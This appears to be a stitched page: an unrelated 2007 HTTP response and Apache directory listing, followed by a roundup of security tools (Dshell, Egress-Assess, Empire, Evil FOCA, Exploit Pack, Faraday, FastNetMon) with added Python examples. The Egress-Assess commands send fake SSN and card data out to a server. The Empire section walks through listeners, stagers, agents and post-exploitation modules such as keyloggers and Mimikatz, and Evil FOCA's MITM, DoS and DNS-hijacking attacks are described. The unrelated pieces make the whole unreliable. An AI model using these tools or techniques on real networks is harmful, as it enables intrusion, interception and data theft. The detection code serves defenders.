User-Agent: Lynx/2.8.6rel.2 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8b

HTTP/1.1 200 OK
Date: Sun, 05 Aug 2007 19:16:44 GMT
Server: Apache
Content-Length: 2121
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /</title>
 </head>
 <body>
<h1>Index of /</h1>
<pre><img src="/icons/blank.gif" alt="Icon "> <a href="?C=N;O=D">Name</a>                    <a href="?C=M;O=A">Last modified</a>      <a href="?C=S;O=A">Size</a>  <a href="?C=D;O=A">Description</a><hr><img src="/icons/folder.gif" alt="[DIR]"> <a href="202-vorbereitung/">202-vorbereitung/</a>       06-Jul-2007 14:31    -   
<img src="/icons/layout.gif" alt="[   ]"> <a href="Efficient_Video_on_demand_over_Multicast.pdf">Efficient_Video_on_d..&gt;</a> 19-Dec-2006 03:17  291K  
<img src="/icons/unknown.gif" alt="[   ]"> <a href="Welcome%20Stranger!!!">Welcome Stranger!!!</a>     28-Dec-2006 03:46    0   
<img src="/icons/text.gif" alt="[TXT]"> <a href="barschel.htm">barschel.htm</a>            31-Jul-2007 02:21   44K  
<img src="/icons/folder.gif" alt="[DIR]"> <a href="bnd/">bnd/</a>                    30-Dec-2006 08:59    -   
<img src="/icons/folder.gif" alt="[DIR]"> <a href="cia/">cia/</a>                    28-Jun-2007 00:04    -   
<img src="/icons/layout.gif" alt="[   ]"> <a href="cisco_ccna_640-801_command_reference_guide.pdf">cisco_ccna_640-801_c..&gt;</a> 28-Dec-2006 03:48  236K  
<img src="/icons/folder.gif" alt="[DIR]"> <a href="doc/">doc/</a>                    19-Sep-2006 01:43    -   
<img src="/icons/folder.gif" alt="[DIR]"> <a href="freenetproto/">freenetproto/</a>           06-Dec-2006 09:00    -   
<img src="/icons/folder.gif" alt="[DIR]"> <a href="korrupt/">korrupt/</a>                03-Jul-2007 11:57    -   
<img src="/icons/folder.gif" alt="[DIR]"> <a href="mp3_technosets/">mp3_technosets/</a>         04-Jul-2007 08:56    -   
<img src="/icons/text.gif" alt="[TXT]"> <a href="neues_von_rainald_goetz.htm">neues_von_rainald_go..&gt;</a> 21-Mar-2007 23:27   31K  
<img src="/icons/text.gif" alt="[TXT]"> <a href="neues_von_rainald_goetz0.htm">neues_von_rainald_go..&gt;</a> 21-Mar-2007 23:29   36K  
<img src="/icons/layout.gif" alt="[   ]"> <a href="pruef.pdf">pruef.pdf</a>               28-Dec-2006 07:48   88K  
<hr></pre>
</body></html>
Chaining decoders to view flow data for a specific country code in sample traffic (note: TCP handshakes are not included in the packet count)
Dshell> decode -d country+netflow --country_code=JP ~/pcap/SkypeIRC.cap
2006-08-25 19:32:20.651502       192.168.1.2 ->  202.232.205.123  (-- -> JP)  UDP   60583   33436     1      0       36        0  0.0000s
2006-08-25 19:32:20.766761       192.168.1.2 ->  202.232.205.123  (-- -> JP)  UDP   60583   33438     1      0       36        0  0.0000s
2006-08-25 19:32:20.634046       192.168.1.2 ->  202.232.205.123  (-- -> JP)  UDP   60583   33435     1      0       36        0  0.0000s
2006-08-25 19:32:20.747503       192.168.1.2 ->  202.232.205.123  (-- -> JP)  UDP   60583   33437     1      0       36        0  0.0000s
Collecting netflow data for sample traffic with vlan headers, then tracking the connection to a specific IP address

Dshell> decode -d netflow ~/pcap/vlan.cap
1999-11-05 18:20:43.170500    131.151.20.254 ->  255.255.255.255  (US -> --)  UDP     520     520     1      0       24        0  0.0000s
1999-11-05 18:20:42.063074     131.151.32.71 ->   131.151.32.255  (US -> US)  UDP     138     138     1      0      201        0  0.0000s
1999-11-05 18:20:43.096540     131.151.1.254 ->  255.255.255.255  (US -> --)  UDP     520     520     1      0       24        0  0.0000s
1999-11-05 18:20:43.079765     131.151.5.254 ->  255.255.255.255  (US -> --)  UDP     520     520     1      0       24        0  0.0000s
1999-11-05 18:20:41.521798    131.151.104.96 ->  131.151.107.255  (US -> US)  UDP     137     137     3      0      150        0  1.5020s
1999-11-05 18:20:43.087010     131.151.6.254 ->  255.255.255.255  (US -> --)  UDP     520     520     1      0       24        0  0.0000s
1999-11-05 18:20:43.368210   131.151.111.254 ->  255.255.255.255  (US -> --)  UDP     520     520     1      0       24        0  0.0000s
1999-11-05 18:20:43.250410    131.151.32.254 ->  255.255.255.255  (US -> --)  UDP     520     520     1      0       24        0  0.0000s
1999-11-05 18:20:43.115330    131.151.10.254 ->  255.255.255.255  (US -> --)  UDP     520     520     1      0       24        0  0.0000s
1999-11-05 18:20:43.375145   131.151.115.254 ->  255.255.255.255  (US -> --)  UDP     520     520     1      0       24        0  0.0000s
1999-11-05 18:20:43.363348   131.151.107.254 ->  255.255.255.255  (US -> --)  UDP     520     520     1      0       24        0  0.0000s
1999-11-05 18:20:40.112031      131.151.5.55 ->    131.151.5.255  (US -> US)  UDP     138     138     1      0      201        0  0.0000s
1999-11-05 18:20:43.183825     131.151.32.79 ->   131.151.32.255  (US -> US)  UDP     138     138     1      0      201        0  0.0000s


Download Dshell

Egress-Assess - Tool used to Test Egress Data Detection Capabilities


Egress-Assess is a tool used to test egress data detection capabilities.

Setup

To setup, run the included setup script, or perform the following:
  1. Install pyftpdlib
  2. Generate a server certificate and store it as "server.pem" on the same level as Egress-Assess. This can be done with the following command:
     openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes

Usage

The typical use case for Egress-Assess is to copy the tool to two locations. One location will act as the server, the other will act as the client. Egress-Assess can send data over FTP, HTTP, and HTTPS.
To exfiltrate data over FTP, you would first start Egress-Assess's FTP server by selecting "--server ftp" and providing a username and password to use:
./Egress-Assess.py --server ftp --username testuser --password pass123
Now, to have the client connect and send data to the ftp server, you could run...
./Egress-Assess.py --client ftp --username testuser --password pass123 --ip 192.168.63.149 --datatype ssn
Also, you can setup Egress-Assess to act as a web server by running....
./Egress-Assess.py --server https
Then, to send data to the HTTPS server, and to specifically send 15 megs of credit card data, run the following command:
./Egress-Assess.py --client https --data-size 15 --ip 192.168.63.149 --datatype cc
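The point of the ssn and cc data types is that the payload looks real enough to trip a DLP rule. The Python below is an added example and does not reproduce Egress-Assess's own generator: it builds Luhn-valid 16-digit test card numbers and SSN-shaped strings in the never-issued 900-999 area range, then runs the detector a defender would put on the egress path, which Luhn-checks digit runs so that random numbers are not flagged. The prefix, record layout and counts are this example's choices, not the tool's.

```python
"""Synthetic card/SSN test data plus the matching egress detector. Added example."""
import random
import re
from typing import List


def luhn_check_digit(partial: str) -> int:
    """Digit that makes partial + digit pass the Luhn check (the last digit of partial is doubled)."""
    total = 0
    for i, ch in enumerate(reversed(partial)):
        d = int(ch)
        if i % 2 == 0:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return (10 - total % 10) % 10


def luhn_valid(number: str) -> bool:
    """Standard Luhn check over the digits of `number`; check digit is the rightmost one."""
    digits = [int(c) for c in number if c.isdigit()]
    if len(digits) < 13:
        return False
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def generate_test_cards(count: int, seed: int = 1, prefix: str = "4") -> List[str]:
    """Luhn-valid 16-digit numbers under an assumed IIN prefix (constructed test data)."""
    rng = random.Random(seed)
    cards = []
    for _ in range(count):
        body = prefix + "".join(str(rng.randrange(10)) for _ in range(15 - len(prefix)))
        cards.append(body + str(luhn_check_digit(body)))
    return cards


def generate_test_ssns(count: int, seed: int = 1) -> List[str]:
    """SSN-shaped strings; area numbers 900-999 have never been issued, so none is real."""
    rng = random.Random(seed)
    return [f"{rng.randrange(900, 1000):03d}-{rng.randrange(1, 100):02d}-{rng.randrange(1, 10000):04d}"
            for _ in range(count)]


def build_payload(cards: List[str], ssns: List[str]) -> str:
    """One record per line, the kind of blob a client would push out over FTP/HTTP(S)."""
    return "\n".join([f"cc,{c}" for c in cards] + [f"ssn,{s}" for s in ssns]) + "\n"


# Detector side: 13-19 digits, optional single spaces/dashes between them.
CARD_RE = re.compile(r"\b(?:\d[ -]?){12,18}\d\b")
SSN_RE = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")


def find_card_numbers(text: str) -> List[str]:
    """Digit runs that also pass Luhn; this drops about 90% of random digit strings."""
    found = []
    for m in CARD_RE.finditer(text):
        digits = re.sub(r"\D", "", m.group())
        if 13 <= len(digits) <= 19 and luhn_valid(digits):
            found.append(digits)
    return found


def find_ssns(text: str) -> List[str]:
    return SSN_RE.findall(text)


if __name__ == "__main__":
    payload = build_payload(generate_test_cards(3, seed=42), generate_test_ssns(2, seed=42))
    print(payload)
    print("cards detected:", find_card_numbers(payload))
    print("ssns detected:", find_ssns(payload))
```

Use the same detector on both ends of a test: if the client sends build_payload() output and the egress monitor's rule cannot reproduce find_card_numbers()'s hits on the captured stream, the gap is in the monitor, not the data.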


Download Egress-Assess

Empire - PowerShell Post-Exploitation Agent


Empire is a pure PowerShell post-exploitation agent built on cryptographically secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.

Why PowerShell?

PowerShell offers a multitude of offensive advantages, including full .NET access, application whitelisting bypasses, direct access to the Win32 API, the ability to assemble malicious binaries in memory, and a default installation on Windows 7+. Offensive PowerShell had a watershed year in 2014, but despite the multitude of useful projects, many pentesters still struggle to integrate PowerShell into their engagements in a secure manner.

Initial Setup

Run the ./setup/install.sh script. This will install the few dependencies and run the ./setup/setup_database.py script. The setup_database.py file contains various settings that you can manually modify, and then initializes the ./data/empire.db backend database. No additional configuration should be needed; hopefully everything works out of the box.
Running ./empire will start Empire, and ./empire --debug will generate a verbose debug log at ./empire.debug. The included ./data/reset.sh will reset/reinitialize the database and launch Empire in debug mode.

Main Menu

Once you hit the main menu, you’ll see the number of active agents, listeners, and loaded modules.


The help command should work for all menus, and almost everything that can be tab-completable is (menu commands, agent names, local file paths where relevant, etc.).

You can ctrl+C to rage quit at any point. Starting Empire back up should preserve existing communicating agents, and any existing listeners will be restarted (as their config is stored in the sqlite backend database).

Listeners 101

The first thing you need to do is set up a local listener. The listeners command will jump you to the listener management menu. Any active listeners will be displayed, and this information can be redisplayed at any time with the list command.


The info command will display the currently configured listener options. Set your host/port with something like set Host http://192.168.52.142:8081 (this is tab-completable, and you can also use domain names here). The port will automatically be pulled out, and the backend will detect whether you're running an HTTP or HTTPS listener. For HTTPS listeners, you must first set CertPath to a local .pem file. The provided ./data/cert.sh script will generate a self-signed cert and place it in ./data/empire.pem.

Optionally set WorkingHours, KillDate, DefaultDelay, and DefaultJitter for the listener, as well as whatever name you want it to be referred to by. You can then type execute to start the listener. If the name is already taken, a nameX variant will be used, and Empire will alert you if the port is already in use.
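The four optional listener settings above decide when and how often an agent calls back, which is also what a network detector keys on. The Python below is an added example, not Empire code: it models DefaultDelay and DefaultJitter as a sleep interval scaled by a random factor, WorkingHours (taken here as HH:MM-HH:MM, an assumption) as a gate on beaconing, and KillDate (taken as MM/DD/YYYY, also an assumption) as a hard stop; it then shows the defender's view, the coefficient of variation of check-in intervals, which jitter exists to push up. Timestamps and values are constructed.

```python
"""Beacon timing under Empire-style listener options, and the periodicity a detector sees. Added example."""
import random
import statistics
from datetime import date, datetime, time, timedelta
from typing import List, Optional, Tuple


def parse_working_hours(spec: Optional[str]) -> Optional[Tuple[time, time]]:
    """'09:00-17:00' -> (time(9, 0), time(17, 0)); empty means no restriction (assumed format)."""
    if not spec:
        return None
    start, end = spec.split("-")
    h1, m1 = (int(x) for x in start.split(":"))
    h2, m2 = (int(x) for x in end.split(":"))
    return time(h1, m1), time(h2, m2)


def within_working_hours(now: datetime, hours: Optional[Tuple[time, time]]) -> bool:
    if hours is None:
        return True
    start, end = hours
    t = now.time()
    if start <= end:
        return start <= t <= end
    return t >= start or t <= end  # window that crosses midnight, e.g. 22:00-02:00


def past_kill_date(now: datetime, kill_date: Optional[str]) -> bool:
    """KillDate as MM/DD/YYYY (assumed format); the agent should exit after that day."""
    if not kill_date:
        return False
    month, day, year = (int(x) for x in kill_date.split("/"))
    return now.date() > date(year, month, day)


def next_delay(delay: float, jitter: float, rng: random.Random) -> float:
    """Seconds to sleep: delay scaled by a uniform factor in [1 - jitter, 1 + jitter].
    jitter is a fraction: 0.0 gives a fixed interval, 0.5 gives +/-50%."""
    jitter = max(0.0, min(jitter, 1.0))
    return delay * rng.uniform(1.0 - jitter, 1.0 + jitter)


def agent_action(now: datetime, working_hours: Optional[str], kill_date: Optional[str]) -> str:
    """'exit' past the kill date, 'sleep' outside working hours, otherwise 'beacon'."""
    if past_kill_date(now, kill_date):
        return "exit"
    if not within_working_hours(now, parse_working_hours(working_hours)):
        return "sleep"
    return "beacon"


def simulate_checkins(start: datetime, count: int, delay: float, jitter: float, seed: int) -> List[datetime]:
    """Constructed check-in timestamps for the given delay/jitter; seeded so runs repeat."""
    rng = random.Random(seed)
    stamps, now = [], start
    for _ in range(count):
        stamps.append(now)
        now += timedelta(seconds=next_delay(delay, jitter, rng))
    return stamps


def interval_cv(stamps: List[datetime]) -> float:
    """Coefficient of variation (stdev / mean) of the gaps between check-ins.
    A beacon detector treats values near 0 as a fixed-interval callback."""
    gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
    if len(gaps) < 2:
        return 0.0
    return statistics.pstdev(gaps) / statistics.mean(gaps)


if __name__ == "__main__":
    t0 = datetime(2015, 8, 10, 9, 0)
    for jitter in (0.0, 0.2, 0.5):
        cv = interval_cv(simulate_checkins(t0, 50, 60, jitter, seed=1))
        print(f"delay=60s jitter={jitter:.1f} -> interval CV {cv:.2f}")
```

A fixed 60-second delay yields a CV of exactly 0 and is trivial to spot in flow data; 50% jitter spreads the gaps over 30 to 90 seconds, but the mean interval is unchanged, so a detector that also looks at connection counts per host per hour is not fooled.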

Stagers 101

The staging process and a complete description of the available stagers is detailed here and here.

Empire implements various stagers in a modular format in ./lib/stagers/*. These include dlls, macros, one-liners, and more. To use a stager, from the main, listeners, or agents menu, use usestager <tab> to tab-complete the set of available stagers, and you'll be taken to the individual stager's menu. The UI here functions similarly to the post module menu, i.e. set/unset/info and generate to generate the particular output code.

For UserAgent and proxy options, default uses the system defaults, none clears that option from being used in the stager, and anything else is assumed to be a custom setting (note: this last bit isn't properly implemented for proxy settings yet). From the Listeners menu, you can run the launcher [listener ID/name] alias to generate the stage0 launcher for a particular listener (this is the stagers/launcher module in the background). This command can be run from a command prompt on any machine to kick off the staging process. (NOTE: you will need to right-click cmd.exe and choose "run as administrator" before pasting/running this command if you want to use modules that require administrative privileges.) Our PowerShell version of the BypassUAC module is in the works but not 100% complete yet.

Agents 101

You should see a status message when an agent checks in (i.e. [+] Initial agent CGUBKC1R3YLHZM4V from 192.168.52.168 now active). Jump to the Agents menu with agents. Basic information on active agents should be displayed. Various commands can be executed on specific agent IDs or all from the agent menu, i.e. kill all. To interact with an agent, use interact AGENT_NAME. Agent names should be tab-completable for all commands.


In an Agent menu, info will display more detailed agent information, and help will display all agent commands. If a typed command isn’t resolved, Empire will try to interpret it as a shell command (like ps). You can cd directories, upload/download files, and rename NEW_NAME.
For each registered agent, a ./downloads/AGENT_NAME/ folder is created (this folder is renamed with an agent rename). An ./agent.log is created here with timestamped commands/results for agent communication. Downloads/module outputs are broken out into relevant folders here as well.
When you’re finished with an agent, use exit from the Agent menu or kill NAME/all from the Agents menu. You’ll get a red notification when the agent exits, and the agent will be removed from the interactive list after.

Modules 101

To see available modules, type usemodule <tab>. To search module names/descriptions, use searchmodule privesc and matching module names/descriptions will be output.

To use a module, for example sharefinder from PowerView, type usemodule situational_awareness/network/sharefinder and press enter. info will display all current module options.


To set an option, like the domain for sharefinder, use set Domain testlab.local. The Agent argument is always required, and should be auto-filled from jumping to a module from an agent menu. You can also set Agent <tab> to tab-complete an agent name. execute will task the agent to execute the module, and back will return you to the agent’s main menu. Results will be displayed as they come back.

Scripts

In addition to formalized modules, you are able to simply import and use a .ps1 script in your remote empire agent. Use the scriptimport ./path/ command to import the script. The script will be imported and any functions accessible to the script will now be tab completable using the “scriptcmd” command in the agent. This works well for very large scripts with lots of functions that you do not want to break into a module.


Download Empire

Evil FOCA - MITM, DoS, DNS Hijacking in IPv4 and IPv6 Penetration Testing Tool


Evil Foca is a tool for security pentesters and auditors whose purpose it is to test security in IPv4 and IPv6 data networks. The tool is capable of carrying out various attacks such as:
  • MITM over IPv4 networks with ARP Spoofing and DHCP ACK Injection.
  • MITM on IPv6 networks with Neighbor Advertisement Spoofing, SLAAC attack, fake DHCPv6.
  • DoS (Denial of Service) on IPv4 networks with ARP Spoofing.
  • DoS (Denial of Service) on IPv6 networks with SLAAC DoS.
  • DNS Hijacking.
The software automatically scans the networks and identifies all devices and their respective network interfaces, specifying their IPv4 and IPv6 addresses as well as the physical addresses through a convenient and intuitive interface.

Requirements

Man In The Middle (MITM) attack

The well-known "Man In The Middle" is an attack in which the attacker positions itself so that it can read, insert, or modify traffic passing between two endpoints without either of them noticing. For IPv4 and IPv6, Evil Foca implements the following MITM, DoS and DNS-hijacking techniques:
  • ARP Spoofing: Consists of sending forged ARP messages onto the Ethernet segment. Normally the objective is to associate the attacker's MAC address with the IP address of another device. Any traffic destined for the IP address of the default gateway is then delivered to the attacker instead of its real destination.
  • DHCP ACK Injection: The attacker monitors DHCP exchanges and, at some point during the communication, sends a packet to modify their outcome. Evil Foca turns the machine into a fake DHCP server on the network.
  • Neighbor Advertisement Spoofing: The principle is identical to ARP Spoofing, the difference being that IPv6 does not use ARP; address resolution is carried by ICMPv6 Neighbor Discovery, which uses five message types (Router Solicitation, Router Advertisement, Neighbor Solicitation, Neighbor Advertisement and Redirect). Evil Foca forges Neighbor Advertisements to place itself between the gateway and the victim.
  • SLAAC attack: The objective is to obtain an MITM position when a user connects to an Internet server that has no IPv6 support and must therefore be reached over IPv4. Once Evil Foca is on the link, it handles the victim's domain name resolution and maps IPv4 addresses into IPv6 ones, so the victim's IPv6 stack sends the traffic for IPv4-only servers through the attacker.
  • Fake DHCPv6 server: The attacker poses as the DHCPv6 server, responds to all requests on the network, and distributes IPv6 addresses and a false DNS server in order to steer the victim's destinations or deny service.
  • Denial of Service (DoS) attack: A DoS attack against a machine, a group of machines or a network makes a service or resource unavailable to its users. It normally causes loss of network connectivity by consuming the victim's bandwidth or by overloading the computing resources of the victim's system.
  • DoS attack in IPv4 with ARP Spoofing: This DoS variant plants a nonexistent MAC address in the victim's ARP table. The machine whose table has been poisoned can no longer reach the IP address that is now mapped to the nonexistent MAC.
  • DoS attack in IPv6 with SLAAC attack: A large number of Router Advertisement packets are sent to one or several machines, each announcing a false router and assigning a different IPv6 address and default gateway, exhausting the victim's resources and making the machines unresponsive.
  • DNS Hijacking: DNS hijacking alters the resolution of domain names. It can be achieved with malware that rewrites a host's TCP/IP configuration so that it points to a rogue DNS server under the attacker's control, or by way of an MITM attack, where the attacker receives the DNS requests and answers selected ones itself to send the victim to a destination of the attacker's choosing.
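The SLAAC and Router Advertisement attacks listed above work because hosts accept any Router Advertisement that arrives on the link. The Python below is an added example, not Evil Foca code: it parses an ICMPv6 Router Advertisement from raw bytes (the RFC 4861 header plus the source link-layer, prefix-information and RDNSS options) and compares it with a policy of known router MACs and prefixes, which is the check a defender runs on mirrored traffic to spot a rogue router. Both advertisements are constructed inside the block, MAC addresses and prefixes included; the ICMPv6 checksum is not verified because that needs the IPv6 pseudo-header, which the function does not receive.

```python
"""Parse ICMPv6 Router Advertisements and flag ones that do not match router policy. Added example."""
import ipaddress
import struct
from dataclasses import dataclass, field
from typing import List, Optional, Set

ICMPV6_ROUTER_ADVERTISEMENT = 134
OPT_SOURCE_LLADDR = 1
OPT_PREFIX_INFO = 3
OPT_RDNSS = 25  # Recursive DNS Server option (RFC 8106)


@dataclass
class RouterAdvertisement:
    hop_limit: int
    managed: bool        # M flag: get addresses via DHCPv6
    other_config: bool   # O flag: get other configuration via DHCPv6
    router_lifetime: int # seconds this sender is usable as default router; 0 withdraws it
    source_mac: Optional[str] = None
    prefixes: List[str] = field(default_factory=list)
    dns_servers: List[str] = field(default_factory=list)


def parse_router_advertisement(payload: bytes) -> RouterAdvertisement:
    """Parse the ICMPv6 payload of a Router Advertisement (RFC 4861 section 4.2) and its options.
    Checksum is not verified (needs the IPv6 pseudo-header)."""
    if len(payload) < 16:
        raise ValueError("truncated ICMPv6 header")
    msg_type, _code, _csum, hop_limit, flags, lifetime, _reach, _retrans = struct.unpack("!BBHBBHII", payload[:16])
    if msg_type != ICMPV6_ROUTER_ADVERTISEMENT:
        raise ValueError(f"not a Router Advertisement (type {msg_type})")
    ra = RouterAdvertisement(hop_limit, bool(flags & 0x80), bool(flags & 0x40), lifetime)
    offset = 16
    while offset < len(payload):
        if offset + 2 > len(payload):
            raise ValueError("truncated option header")
        opt_type, opt_len = payload[offset], payload[offset + 1]
        if opt_len == 0:
            raise ValueError("option length 0")  # RFC 4861 says discard the packet
        size = opt_len * 8  # option length is in units of 8 octets, header included
        body = payload[offset + 2:offset + size]
        if len(body) != size - 2:
            raise ValueError("truncated option body")
        if opt_type == OPT_SOURCE_LLADDR and len(body) >= 6:
            ra.source_mac = ":".join(f"{b:02x}" for b in body[:6])
        elif opt_type == OPT_PREFIX_INFO and opt_len == 4:
            # prefix_len(1) flags(1) valid(4) preferred(4) reserved(4) prefix(16)
            ra.prefixes.append(f"{ipaddress.IPv6Address(body[14:30])}/{body[0]}")
        elif opt_type == OPT_RDNSS and opt_len >= 3:
            addrs = body[6:]  # after reserved(2) + lifetime(4)
            for i in range(0, len(addrs) - 15, 16):
                ra.dns_servers.append(str(ipaddress.IPv6Address(addrs[i:i + 16])))
        offset += size
    return ra


def build_router_advertisement(source_mac: str, prefix: str, prefix_len: int,
                               dns: Optional[str] = None, lifetime: int = 1800) -> bytes:
    """Assemble an RA for testing; checksum left at 0 (a real sender fills it in)."""
    header = struct.pack("!BBHBBHII", ICMPV6_ROUTER_ADVERTISEMENT, 0, 0, 64, 0, lifetime, 0, 0)
    mac = bytes(int(x, 16) for x in source_mac.split(":"))
    opts = struct.pack("!BB", OPT_SOURCE_LLADDR, 1) + mac
    opts += struct.pack("!BBBBIII", OPT_PREFIX_INFO, 4, prefix_len, 0xC0, 2592000, 604800, 0)
    opts += ipaddress.IPv6Address(prefix).packed
    if dns:
        opts += struct.pack("!BBHI", OPT_RDNSS, 3, 0, lifetime) + ipaddress.IPv6Address(dns).packed
    return header + opts


@dataclass
class RouterPolicy:
    known_router_macs: Set[str]
    allowed_prefixes: Set[str]


def rogue_ra_findings(ra: RouterAdvertisement, policy: RouterPolicy) -> List[str]:
    """Reasons this RA looks like a rogue router / SLAAC attack; empty means it matches policy."""
    findings = []
    if ra.source_mac is None:
        findings.append("no source link-layer address option")
    elif ra.source_mac not in policy.known_router_macs:
        findings.append(f"unknown router MAC {ra.source_mac}")
    for p in ra.prefixes:
        if p not in policy.allowed_prefixes:
            findings.append(f"unexpected prefix {p}")
    if ra.dns_servers:
        findings.append("RA pushes DNS servers " + ", ".join(ra.dns_servers))
    if ra.router_lifetime == 0:
        findings.append("router lifetime 0 (withdraws the default route)")
    return findings


# Constructed advertisements: one from the real gateway, one from an attacker.
LEGIT_RA = build_router_advertisement("00:11:22:33:44:55", "2001:db8:1::", 64)
ROGUE_RA = build_router_advertisement("de:ad:be:ef:00:01", "2001:db8:bad::", 64, dns="2001:db8:bad::53")
POLICY = RouterPolicy({"00:11:22:33:44:55"}, {"2001:db8:1::/64"})

if __name__ == "__main__":
    for name, raw in (("legit", LEGIT_RA), ("rogue", ROGUE_RA)):
        print(name, rogue_ra_findings(parse_router_advertisement(raw), POLICY) or ["ok"])
```

The same parser feeds the IPv4 side of the problem only indirectly: ARP has no equivalent option structure, so the ARP-spoofing variants above are caught by watching for an IP address changing MAC, not by parsing an announcement. On the IPv6 side, RA Guard on the switch port is the control that stops these packets before a host sees them.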


Download Evil FOCA

Exploit Pack - Open Source Security Project for Penetration Testing and Exploit Development


Exploit Pack is an open source GPLv3 security tool, which means it is fully free and you can use it without any kind of restriction. Other security tools like Metasploit, Immunity Canvas, or Core Impact are ready to use as well, but you will require an expensive license to get access to all the features, for example: automatic exploit launching, full report capabilities, reverse shell agent customization, etc. Exploit Pack is fully free, open source and GPLv3. Because this is an open source project you can always modify it, add or replace features and get involved in the next project decisions; everyone is more than welcome to participate. We developed this tool as pentesters, for pentesters. As security professionals we use Exploit Pack on a daily basis to run real-environment attacks against real corporate clients.

Video demonstration of the latest Exploit Pack release:


More than 300+ exploits

Military grade professional security tool

Exploit Pack comes into the scene when you need to execute a pentest in a real environment, it will provide you with all the tools needed to gain access and persist by the use of remote reverse agents.

Remote Persistent Agents

Reverse a shell and escalate privileges

Exploit Pack will provide you with a complete set of features to create your own custom agents, you can include exploits or deploy your own personalized shellcodes directly into the agent.

Write your own Exploits

Use Exploit Pack as a learning platform

Quick exploit development: extend your capabilities and code your own custom exploits using the Exploit Wizard and the built-in Python Editor, adapted to fulfil the needs of an exploit writer.


Download Exploit Pack

Faraday 1.0.15 - Collaborative Penetration Test and Vulnerability Management Platform


A brand new version is ready for you to enjoy! Faraday v1.0.15 (Community, Pro & Corp) was published today with new exciting features.

As a part of our constant commitment to the IT sec community we added a tool that runs several other tools against all IPs in a given list. This results in a major scan of your infrastructure which can be done as frequently as necessary. Interested? Read more about it here.

This version also features three new plugins and a fix developed entirely by our community! Congratulations to Andres and Ezequiel for being the first two winners of the Faraday Challenge! Are you interested in winning tickets for Ekoparty as well? Submit your pull request or find us on freenode #faraday-dev and let us know.

Changes:

* Continuous Scanning Tool cscan added to ./scripts/cscan
* Hosts and Services views now have pagination and search



* Updates version number on Faraday Start
* Added Services columns to Status Report


* Converted references to links in Status Report. Support for CVE, CWE, Exploit Database and Open Source Vulnerability Database
* Added Pippingtom, SSHdefaultscan and pasteAnalyzer plugins

Fixes: 

* Debian install
* Saving objects without parent
* Visual fixes on Firefox


Download Faraday 1.0.15

Faraday 1.0.16 - Collaborative Penetration Test and Vulnerability Management Platform


Faraday introduces a new concept - IPE (Integrated Penetration-Test Environment), a multiuser penetration test IDE. It is designed for distribution, indexation and analysis of the data generated during a security audit.

This version comes with major changes to our Web UI, including the possibility to mark vulnerabilities as false positives. If you have a Pro or Corp license you can now create an Executive Report using only confirmed vulnerabilities, saving you even more time.

A brand new feature that comes with v1.0.16 is the ability to group vulnerabilities by any field in our Status Report view. Combine it with bulk edit to manage your findings faster than ever!

This release also features several new features developed entirely by our community. 


Changes:

* Added group vulnerabilities by any field in our Status Report
* Added port to Service type target in new vuln modal
* Filter false-positives in Dashboard, Status Report and Executive Report (Pro&Corp)
  (Screenshot: Filter in Status Report view)
* Added Wiki information about running Faraday without configuring CouchDB https://github.com/infobyte/faraday/wiki/APIs
* Added parametrization for port configuration on APIs
* Added scripts to:
    - get all IPs from targets that have no services (/bin/getAllIpsNotServices.py)
    - get all IP addresses that have a defined open port (/bin/getAllbySrv.py) and get all IPs from targets without services (/bin/delAllVulnsWith.py)
      It's important to note that both these scripts hold a variable that you can modify to alter their behaviour. /bin/getAllbySrv.py has a port variable set to 8080 by default. /bin/delAllVulnsWith.py does the same with a RegExp
* Added three Plugins:
    - Immunity Canvas
      (Screenshot: Canvas configuration)
    - Dig
    - Traceroute
* Refactor Plugin Base to update active WS name in var
* Refactor Plugins to use current WS in temp filename under $HOME/.faraday/data. Affected Plugins:
    - amap
    - dnsmap
    - nmap
    - sslcheck
    - wcscan
    - webfuzzer
    - nikto

Bug fixes:
* When the last workspace was null Faraday wouldn't start
* CSV export/import in QT
* Fixed bug that prevented the use of "reports" and "cwe" strings in Workspace names
* Unicode support in Nexpose-full Plugin
* Fixed bug get_installed_distributions from handler exceptions
* Fixed bug in first run of Faraday with log path and API errors


Download Faraday 1.0.16

Faraday v1.0.7 - Integrated Penetration-Test Environment a multiuser Penetration test IDE



Faraday introduces a new concept, IPE (Integrated Penetration-Test Environment), a multiuser penetration test IDE. It is designed for distribution, indexation and analysis of the data generated during a security audit.

The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.

Designed for simplicity, users should notice no difference between their own terminal application and the one included in Faraday. Developed with a specialized set of functionalities that help users improve their own work. Do you remember yourself programming without an IDE? Well, Faraday does the same as an IDE does for you when programming, but from the perspective of a penetration test.

Changes made to the UX/UI:
  • Improved Vulnerability Edition usability: selecting a vulnerability will load its content automatically.
  • ZSH UI now is showing notifications.
  • ZSH UI displays active workspaces.
  • Faraday now asks confirmation when exiting out. If you have pending conflicts to resolve it will show the number for each one.
  • Vulnerability creation is now supported in the status report.
  • Introducing SSLCheck, a tool for verifying bugs in SSL/TLS Certificates on remote hosts. This is integrated with Faraday as a plugin.
  • Shodan Plugin is now working with the new API.
  • Some cosmetic changes for the status report.
Bugfixes:
  • Sorting columns in the Status Report is running smoothly.
  • The Workspace icon is now based on the type of workspace being used.
  • Opening the reports in QT UI opens the active workspace.
  • UI Web date fixes: we were showing dates with an off-by-one error.
  • Vulnerability edition was missing 'critical' severity.
  • Objects merge bugfixing
  • Metadata recursive save fix

Download Faraday

FastNetMon - Very Fast DDoS Analyzer with Sflow/Netflow/Mirror Support


A high performance DoS/DDoS load analyzer built on top of multiple packet capture engines (NetFlow, IPFIX, sFLOW, netmap, PF_RING, PCAP).

What can we do? We can detect hosts in our own network that receive or send a large amount of packets per second, bytes per second or flows per second, and we can call an external script which can notify you, switch off a server or blackhole the client.

Features:
  • Can process incoming and outgoing traffic
  • Can trigger block script if certain IP loads network with a large amount of packets/bytes/flows per second
  • Can announce blocked IPs to a BGP router with ExaBGP
  • Has integration with Graphite
